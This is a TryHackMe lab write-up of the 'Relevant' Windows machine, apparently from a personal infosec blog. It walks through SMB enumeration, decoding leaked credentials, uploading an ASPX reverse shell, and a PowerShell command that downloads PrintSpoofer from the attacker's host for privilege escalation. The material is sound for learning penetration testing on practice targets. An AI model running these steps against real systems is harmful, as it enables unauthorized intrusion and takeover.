---
layout: single
title: Relevant - TryHackMe (OSCP STYLE)
excerpt: "You have been assigned to a client that wants a penetration test conducted on an e
nvironment due to be released to production in seven days.

With this introduction, TryHackMe proposes us the following challenge, basically they ask us to perform a black box pentest simulating that we are going to test the security of an application that will go into production in 7 days"
date: 2023-05-14
classes: wide
header:
  teaser: /assets/images/relevant/portada.png
  teaser_home_page: true
categories:
  - TryHackMe
  - infosec
tags:
  - TryHackMe
  - windows
  - SMB Enumeration
  - SeImpersonatePrivilege
  - Cracking
---

## Enumeration

As I usually do in all my write-ups, the first thing we are going to do is check if we have connectivity with the machine

```
┌──(kali㉿kali)-[~]
└─$ ping -c4 10.10.81.172      
PING 10.10.81.172 (10.10.81.172) 56(84) bytes of data.
64 bytes from 10.10.81.172: icmp_seq=1 ttl=127 time=43.2 ms
64 bytes from 10.10.81.172: icmp_seq=2 ttl=127 time=43.8 ms
64 bytes from 10.10.81.172: icmp_seq=3 ttl=127 time=44.0 ms
64 bytes from 10.10.81.172: icmp_seq=4 ttl=127 time=44.7 ms

--- 10.10.81.172 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 43.235/43.930/44.716/0.530 ms
```

The ttl is 127 so we can supose that we are facing a windows machine

I run my usual scan, which reports 8 open ports

```
sudo nmap -p- -sS --min-rate 5000 --open -T5 -vvv -n -Pn 10.10.81.172 -oG allPorts
```

![1]

Among those ports, some stand out more than others, the first one that caught my attention is port 80, indicating that a web service is running, and ports 139 and 445 related to the SMB protocol, maybe we can enumerate some interesting resources.

To get a bit more context, I run an nmap scan to determine the versions of those services running

```
┌──(kali㉿kali)-[~/Documents/THM/Relevant/nmap]
└─$ nmap -sVC -p80,139,445,3389 10.10.81.172

```

![2]

We navigate to the web page where we don't find much information, it's the default page of the Windows IIS.

We tried to fuzz it to find any hidden directories, but we didn't find nothing

If we enumerate the resources in the SMB, we can see that there is more to explore

```
┌──(kali㉿kali)-[~/Documents/THM/Relevant/nmap]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.81.172 
```

![3]


Despite the supposed difficulty of the machine, it occurred to me to launch the nmap scan that checks if the victim is vulnerable to EternalBlue.

```
┌──(kali㉿kali)-[~/Documents/THM/Relevant/exploits]
└─$ nmap -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 10.10.81.172

```

![4]

After trying for hours, I realized that it was impossible to enter through this method, so I decided to list the SMB content again and realized that the `nt4wrksv` folder was accessible

I connected to the shared resource without a password using the -N option and listed it. I discovered that the file passwords.txt existed

![5]

![6]

We can use a simple decoder, since the passwords are in base64. I have used CyberChef and found the following:

```
Bill - Juw4nnaM4n420696969!$$$
Bob - !P@$$W0rD!123
```

Now we have two potential users with their respective passwords.

## Initial Access

If we remember from the beginning of the write-up, we tried to find some directory to connect to, but the wfuzz tool did not return anything. I also tried through port 80 and the accessible SMB directory but didn't find anything.

As I was running out of options, I went back to review all the open ports on the machine.

Besides the typical ports, we have to remember that we have ports 3389, 49663, 49667, and 49669.

After trying them one by one, I found a way to proceed through port 49663.

![7]
It seems that we have access to the content of the shared resource from here. The first question that comes to my mind is: can we upload files and view them from this path?

We will temporarily exit the SMB console where we will create a file named "test.txt", then log back into the resource and verify if we have access to the file.

![8]

![9]
We can upload files that can be executed in the browser, what I'm thinking is to upload a reverse shell in aspx format that gives us access to the system

From our local machine
```
wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
```

We should modify the LHOS and LPORT parameters 


![10]

Now, we just need to set up a listener on our machine and navigate to the shell, thus obtaining the reverse shell on our computer.

![11]

## Privilege escalation


Here is where I found out that this machine was my downfall. As always, the first thing I enumerated were the permissions of my user, where I saw that the SetImpersonatePrivilege was enabled. After trying several times to use JuicyPotato as we have done on other machines, I realized that the machine always threw an error.

I found my salvation in the printspoofer tool which is compatible with the Windows Server 2016 version that the machine is running.

I downloaded the .exe binary from here

[GitHub](https://github.com/dievus/printspoofer/blob/master/PrintSpoofer.exe)

I uploaded it to the machine

```
powershell -command "iex(New-Object Net.WebClient).downloadFile('http://10.14.49.189:8080/PrintSpoofer.exe', 'c:\Users\Public\PrintSpoofer.exe')"
```

And finally get my Administrator shell

![12]

However, thinking that JuicyPotato didn't work for me because of the Windows version reminded me of the first vulnerability I had been trying (eternalblue), could it be that I was experiencing the same problem?

  
The nmap script seemed to indicate that the system was vulnerable, in other writes ups I found that we can exploit eternalblue o this machine with eternalromance exploit, anyway we did by this method that is manually too.


[1]:/assets/images/relevant/1.png
[2]:/assets/images/relevant/2.png
[3]:/assets/images/relevant/3.png
[4]:/assets/images/relevant/4.png
[5]:/assets/images/relevant/5.png
[6]:/assets/images/relevant/6.png
[7]:/assets/images/relevant/7.png
[8]:/assets/images/relevant/8.png
[9]:/assets/images/relevant/9.png
[10]:/assets/images/relevant/10.png
[11]:/assets/images/relevant/11.png
[12]:/assets/images/relevant/12.png

